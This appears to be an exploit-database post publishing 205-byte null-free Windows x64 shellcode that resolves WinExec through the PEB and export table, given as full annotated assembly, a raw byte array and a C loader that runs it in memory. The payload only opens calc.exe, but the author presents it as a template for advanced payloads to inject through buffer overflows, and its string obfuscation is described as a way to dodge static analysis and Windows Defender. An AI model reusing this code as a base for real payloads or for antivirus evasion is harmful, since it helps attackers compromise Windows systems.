windowsx64 dynamic nullfree winexec popcalc shellcode (205 bytes)

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windowsx64 dynamic nullfree winexec popcalc shellcode (205 bytes) Code Code...
# Shellcode Title: Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) # Shellcode Author: Bobby Cooke (boku) # Date: 02/05/2021 # Tested on: Windows 10 v2004 (x64) # Shellcode Description: # 64bit Windows 10 shellcode that dynamically resolves the base address of kernel32.dll via PEB & ExportTable method. # Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities. # Grew tired of Windows Defender alerts from MSF code when developing, so built this as a template for development of advanced payloads. ; Compile & get shellcode from Kali: ; nasm -f win64 popcalc.asm -o popcalc.o ; for i in $(objdump -D popcalc.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done ; Get kernel32.dll base address xor rdi, rdi ; RDI = 0x0 mul rdi ; RAX&RDX =0x0 mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB mov rbx, [rbx+0x18] ; RBX = Address_of_LDR mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll) mov r8, rbx ; RBX & R8 = &kernel32.dll ; Get kernel32.dll ExportTable Address mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add add cx, 0x88ff shr rcx, 0x8 ; RCX = 0x88ff --> 0x88 mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable ; Get &AddressTable from Kernel32.dll ExportTable xor r10, r10 mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable add r10, r8 ; R10 = &AddressTable ; Get &NamePointerTable from Kernel32.dll ExportTable xor r11, r11 mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable) ; Get &OrdinalTable from Kernel32.dll ExportTable xor r12, r12 mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable add r12, r8 ; R12 = &OrdinalTable jmp short apis ; Get the address of the API from the Kernel32.dll ExportTable getapiaddr: pop rbx ; save the return address for ret 2 caller after API address is found pop rcx ; Get the string length counter from stack xor rax, rax ; Setup Counter for resolving the API Address after finding the name string mov rdx, rsp ; RDX = Address of API Name String to match on the Stack push rcx ; push the string length counter to stack loop: mov rcx, [rsp] ; reset the string length counter from the stack xor rdi,rdi ; Clear RDI for setting up string name retrieval mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string) repe cmpsb ; Compare strings at RDI & RSI je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API incloop: inc rax jmp short loop ; Find the address of GetProcAddress by using the last value of the Counter resolveaddr: pop rcx ; remove string length counter from top of stack mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API> mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber] add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress push rbx ; place the return address from the api string call back on the top of the stack ret ; return to API caller apis: ; API Names to resolve addresses ; WinExec | String length : 7 xor rcx, rcx add cl, 0x7 ; String length for compare string mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis shr rax, 0x8 ; xEcoll,0xFFFF --> 0x0000,xEcoll push rax push rcx ; push the string length counter to stack call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable mov r14, rax ; R14 = Kernel32.WinExec Address ; UINT WinExec( ; LPCSTR lpCmdLine, => RCX = "calc.exe",0x0 ; UINT uCmdShow => RDX = 0x1 = SW_SHOWNORMAL ; ); xor rcx, rcx mul rcx ; RAX & RDX & RCX = 0x0 ; calc.exe | String length : 8 push rax ; Null terminate string on stack mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe" not rax ;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163 push rax ; RSP = "calc.exe",0x0 mov rcx, rsp ; RCX = "calc.exe",0x0 inc rdx ; RDX = 0x1 = SW_SHOWNORMAL sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA) call r14 ; Call WinExec("calc.exe", SW_HIDE) ########################################################################################################################################### // runShellcode.c // C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net) #include <windows.h> void main() { void* exec; BOOL rv; HANDLE th; DWORD oldprotect = 0; // Shellcode unsigned char payload[] = "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b" "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2" "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b" "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04" "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0" "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2" "\x48\x83\xec\x20\x41\xff\xd6"; unsigned int payload_len = 205; exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); RtlMoveMemory(exec, payload, payload_len); rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect); th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0); WaitForSingleObject(th, -1); }

Windowsx64 dynamic nullfree winexec popcalc shellcode (205 bytes) Vulnerability / Exploit Source : Windowsx64 dynamic nullfree winexec popcalc shellcode (205 bytes)

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